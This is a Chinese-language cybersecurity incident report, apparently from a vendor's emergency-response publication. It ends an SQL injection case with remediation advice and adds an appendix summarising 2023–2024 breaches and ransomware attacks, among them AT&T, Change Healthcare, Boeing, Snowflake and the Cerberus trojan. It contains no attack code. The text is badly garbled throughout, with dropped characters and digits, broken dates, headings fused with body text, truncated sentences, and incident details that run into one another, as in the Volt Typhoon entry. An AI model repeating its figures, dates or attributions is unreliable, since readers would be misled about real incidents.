yKjndKjndSQLSQL處置方式SQL“/services/operOriztion”進(jìn)行禁用。并及時聯(lián)系廠商進(jìn)行漏洞修復(fù)，SQL“/services/operOriztion”進(jìn)行禁用。并及時聯(lián)系廠商進(jìn)行漏洞修復(fù)，同理，再使用深信服應(yīng)急響應(yīng)工具庫中的MRK_HW專版工具對主機(jī)進(jìn)程進(jìn)行一鍵掃描即可，以確認(rèn)攻擊者事件結(jié)論SQL注入漏洞常是因為攻擊者未對SQLSQL如上述案例中，通過代碼審計，易發(fā)現(xiàn)相關(guān)參數(shù)未進(jìn)行處理，就直接進(jìn)行SQL語句的拼接使用，為了預(yù)防這種情況，我們應(yīng)增強(qiáng)代碼規(guī)范性，在需求分析階段明確安全需求，要求對所有用戶輸入進(jìn)行驗證和過濾；使用參數(shù)化查詢或正確地使QLSQL注入攻擊。建立反饋機(jī)制，收集開發(fā)團(tuán)隊、測試人員和用戶的反饋，改進(jìn)安全措施。附錄：????-大型AT&T7300（2024附錄：????-大型事件概述2024年3月，美國電話電報公司（AT&T）遭受了一次數(shù)據(jù)泄露攻擊，涉及約760萬當(dāng)前客戶和約6540萬前客戶，總計7300AT&T危害此次數(shù)據(jù)泄露攻擊對AT&T的聲譽和客戶信任度造成了嚴(yán)重影響。此外，泄露的通信記錄和賬戶信息可能對客戶的隱私和應(yīng)對措施事件概述2024年2月，VoltTyphoon組織劫持了位于美國的“數(shù)百臺”小型辦公室/家庭辦公室（SOHO）路由器，并將其組成僵尸網(wǎng)絡(luò)對美國關(guān)鍵基礎(chǔ)設(shè)施發(fā)動攻擊。聯(lián)邦調(diào)查局表示，VoltTyphoon攻擊的目標(biāo)包括通信、能源、水和交通等關(guān)鍵（SOHO）路由器僵尸網(wǎng)絡(luò)。該僵尸網(wǎng)絡(luò)由網(wǎng)絡(luò)犯罪分子使用已知的“Moobot”惡意軟件構(gòu)建，后來被俄羅斯APT組織（APT28）危害SOHO路由器攻擊導(dǎo)致了大量用戶網(wǎng)絡(luò)的癱瘓和數(shù)據(jù)泄露風(fēng)險增加，被控制的路由器還可能成為黑客發(fā)動更大規(guī)模網(wǎng)絡(luò)攻應(yīng)對措施SOHOChangeHealthcare遭受勒索軟件攻擊，導(dǎo)致美國醫(yī)療保健系統(tǒng)中斷（2024年2月）事件概述20242ChangeHealthcare程訪問服務(wù)，這個服務(wù)沒有啟用多因素認(rèn)證（MFA）6TB危害ChangeHealthcare應(yīng)對措施ChangeHealthcare2200波音公司遭受LockBit勒索軟件攻擊，43GB數(shù)據(jù)被竊取（2023年10月）事件概述2023年10月下旬，LockBit43GBLockBit危害應(yīng)對措施2事件概述2023127日，烏克蘭計算機(jī)應(yīng)急響應(yīng)小組（CE-A）在國家新聞機(jī)構(gòu)UkrinormWindws（GPO啟動了CaddyWiper127Ukrinorm結(jié)果克蘭通訊社的運營。DNV1000（20231）事件概述202317DNV，ShipManagerIT1000危害此次攻擊對船級社的全球業(yè)務(wù)都產(chǎn)生了嚴(yán)重影響，DNV方面緊急表示：所有船只仍然可以使用ShipManager軟件的船載應(yīng)對措施CDK遭遇勒索軟件攻擊，導(dǎo)致1.5萬家汽車經(jīng)銷商業(yè)務(wù)中斷（2024年6月）事件概述SaaSCDKGlobal202461.5使用CDKGlobal軟件的美國和加拿大汽車經(jīng)銷商無法使用經(jīng)銷商管理系統(tǒng)（DMS）進(jìn)行正常運營，例如銷售汽車、維修危害應(yīng)對措施CDKGlobal在發(fā)現(xiàn)攻擊后立即關(guān)閉了大部分系統(tǒng)以防止攻擊蔓延，并開始分階段恢復(fù)系統(tǒng)，受影響的經(jīng)銷商也斷開了與CDKCDKGlobalBlackSuit事件概述Petro-CanadaPetro-Points危害SuncorEnergy應(yīng)對措施SuncorEnergy臺積電遭受LockBit攻擊被勒索7000萬美元（2023年6月）事件概述20236TSMC)LockBit7000危害臺積電根據(jù)公司的安全協(xié)議和標(biāo)準(zhǔn)操作程序，立即終止了與受影響供應(yīng)商的數(shù)據(jù)交換。公司將加強(qiáng)供應(yīng)鏈安全管理，提高對外部合作伙伴的安全要求，加強(qiáng)內(nèi)部網(wǎng)絡(luò)的監(jiān)控和入侵檢測以維護(hù)公司的業(yè)務(wù)連續(xù)性。日本制造企業(yè)Hoya感染挖礦病毒，產(chǎn)線被迫停產(chǎn)三天（2023年3月）事件概述2023330HoyaCorporationIT危害攻擊導(dǎo)致產(chǎn)線停產(chǎn)，部分訂單無法按時完成，對公司的業(yè)務(wù)運營和客戶交付造成了嚴(yán)重影響。此外，病毒的清理和系統(tǒng)的恢復(fù)也增加了公司運營成本。應(yīng)對措施Hoya立即隔離受影響的服務(wù)器，并向受影響生產(chǎn)設(shè)施所在國家的有關(guān)當(dāng)局報告。聘請專業(yè)的網(wǎng)絡(luò)安全專家進(jìn)行處理。Hoya事件概述224年7月，某市公安局發(fā)布警情通報稱，該市某公共服務(wù)機(jī)構(gòu)部分網(wǎng)絡(luò)設(shè)備遭受網(wǎng)絡(luò)攻擊，相關(guān)的業(yè)務(wù)數(shù)據(jù)極有可能景的黑客組織。危害應(yīng)對措施海蓮花組織利用GrimResource技術(shù)進(jìn)行釣魚攻擊（2024年6月）事件概述一個東南亞黑客組織，多年來對我國黨政機(jī)關(guān)、國防軍工、科研院所等核心要害單位發(fā)起攻擊。本次使用GrimResource技術(shù)進(jìn)行釣魚攻擊，MSC危害GrimResource技術(shù)可繞過防御，能夠繞過ActiveX控件告警，實現(xiàn)無文件落地的payload執(zhí)行；在野外發(fā)現(xiàn)的樣本在VirusTotal中有0個靜態(tài)檢測，表明其隱蔽性極高，難以被發(fā)現(xiàn)；可以預(yù)見，MSC樣式的魚叉郵件可能會替代lnk、o?ce應(yīng)對措施新，以識別和防御最新的惡意軟件；監(jiān)測網(wǎng)絡(luò)流量中可能的異常行為。美國國家環(huán)境保護(hù)局遭遇外網(wǎng)攻擊，超過850萬用戶數(shù)據(jù)泄露（2024年4月）事件概述20244（EPA）遭受了一次嚴(yán)重的網(wǎng)絡(luò)攻擊，導(dǎo)致大量敏感數(shù)據(jù)被泄露。此次事件可能由一名USDoD850（包括客戶和承包商）的個人隱私信息被外泄。危害此次數(shù)據(jù)泄露攻擊對美國國家環(huán)境保護(hù)局的聲譽和公信力造成了嚴(yán)重?fù)p害。泄露的數(shù)據(jù)在俄羅斯黑客和網(wǎng)絡(luò)犯罪論壇中流傳，可能被用于不正當(dāng)目的，對國家安全構(gòu)成潛在威脅。EPA立即切斷了受影響的系統(tǒng)連接，防止攻擊者進(jìn)一步獲取數(shù)據(jù)或破壞系統(tǒng)，啟動了數(shù)據(jù)恢復(fù)計劃，從備份中恢復(fù)受影響事件概述危害影響了希臘國內(nèi)中學(xué)期末考試，教師無法從題庫平臺抽取考題，部分考生不得不在教室等待數(shù)小時。也可能泄露學(xué)生的個人信息和考試成績等敏感信息。應(yīng)對措施防止此類事件再次發(fā)生。地獄級銀行木馬病毒Cerberus變種再起，在多個國家傳播（2024年9月）事件概述ErrorFatherCerberusCerberus馬最初因其通過鍵盤記錄、覆蓋攻擊和VNC功能竊取金融及社交媒體應(yīng)用的憑證而聲名鵲起，能夠繞過安全限制，并具備高度的隱蔽性和難以檢測的特性。CRIL研究人員在2024年9月和10月識別到這段時間內(nèi)該活動顯著增加，表明ErrorFather危害ErortheriOS竊取銀行信息。通過覆蓋攻擊進(jìn)行操作，掃描手機(jī)中的金融應(yīng)用，并在用戶與這些應(yīng)用互動時加載假釣魚頁面，從而竊取用戶輸入的信息。應(yīng)對措施建議用戶從官方應(yīng)用商店下載應(yīng)用，避免使用小眾或上線時間短的應(yīng)用軟件；不要隨意下載應(yīng)用或點擊陌生鏈接，尤其是來自論壇或社交媒體的鏈接。確保設(shè)備上安裝最新的殺毒軟件，定期進(jìn)行手機(jī)安全掃描和病毒查殺，確保設(shè)備安全。美國知名銀行EvolveBank&Trust遭攻擊導(dǎo)致約760萬名客戶數(shù)據(jù)被盜（2024年7月）事件概述LockbitEvolve危害此次攻擊導(dǎo)致EvolveBank&Trust的客戶數(shù)據(jù)被盜，部分系統(tǒng)無法正常工作，影響了金融科技公司如A?rm、Wise和Bilt7640112應(yīng)對措施EvolveBank&Trust迅速采取應(yīng)急措施保障客戶資金安全，為美國居民提供了為期兩年的信用監(jiān)控和身份保護(hù)服務(wù)，并金融科技公司EquiLend遭攻擊導(dǎo)致部分關(guān)鍵業(yè)務(wù)暫停（2024年1月）事件概述EquiLend20241危害此次攻擊導(dǎo)致EquiLend的部分服務(wù)，包括NGT、Post-TradeSolutions、Data&AnalyticsSolutions和RegTechSolutionsEquiLend在發(fā)現(xiàn)事件后公司立即聘請了第三方網(wǎng)絡(luò)安全專家并啟動了調(diào)查，同時迅速采取措施控制事件影響，并逐步恢某銀行美國子公司被LockBit勒索軟件攻擊（2023年11月）事件概述202311LockBitLockBit危害攻擊對該銀行業(yè)務(wù)運營和數(shù)據(jù)安全造成了嚴(yán)重影響，業(yè)務(wù)中斷導(dǎo)致公司無法正常提供服務(wù)，影響了客戶的業(yè)務(wù)辦理和資金流轉(zhuǎn)。泄露的數(shù)據(jù)可能包括客戶敏感信息、交易記錄等，對客戶的隱私和資金安全構(gòu)成潛在威脅。應(yīng)對措施該銀行表示，發(fā)現(xiàn)攻擊后立即切斷并隔離了受影響系統(tǒng)，展開徹底調(diào)查并向執(zhí)法部門報告，并在專業(yè)信息安全專家團(tuán)隊的支持下推進(jìn)恢復(fù)工作。后續(xù)將加強(qiáng)金融服務(wù)系統(tǒng)的安全防護(hù)，包括數(shù)據(jù)備份和恢復(fù)計劃。在線金融服務(wù)商PayPal遭遇撞庫攻擊，34942名用戶受影響（2023年1月）事件概述20231PayPal34942危害ayal的業(yè)務(wù)發(fā)展和用戶信任度產(chǎn)生了負(fù)面影響。應(yīng)對措施遭受攻擊后，PayPal迅速凍結(jié)了所有受影響的用戶賬戶，防止攻擊者進(jìn)一步竊取資金或篡改賬戶信息。查明事件情況后，向用戶發(fā)送電子郵件，告知系統(tǒng)近期遭到撞庫攻擊，部分用戶數(shù)據(jù)可能已經(jīng)泄露。PayPal云基礎(chǔ)設(shè)施公司Snow?ake數(shù)據(jù)泄露波及全球165家知名企業(yè)（2024年6月）事件概述2024年6月，云存儲巨頭Snowflake遭黑客攻擊，全球超過165家知名企業(yè)因此遭遇數(shù)據(jù)泄露，包括票務(wù)巨頭Ticketmaster、桑坦德集團(tuán)（SantanderGroup）AdvanceAutoParts危害此次事件被認(rèn)為是云計算歷史上最嚴(yán)重的數(shù)據(jù)泄漏事件之一，導(dǎo)致全球多家知名企業(yè)的敏感數(shù)據(jù)被非法訪問和泄露，可能讓數(shù)以億計的個人受到影響，如個人身份信息被竊取等，對個人隱私和企業(yè)聲譽都會造成嚴(yán)重?fù)p害。應(yīng)對措施nwfle某些憑據(jù)已有數(shù)年歷史。為防止類似事件，云服務(wù)提供商必須實施強(qiáng)大的多因素身份驗證和安全身份驗證措施，采用更嚴(yán)格的安全默認(rèn)設(shè)置來保護(hù)其客戶。TheMoon886（20243）事件概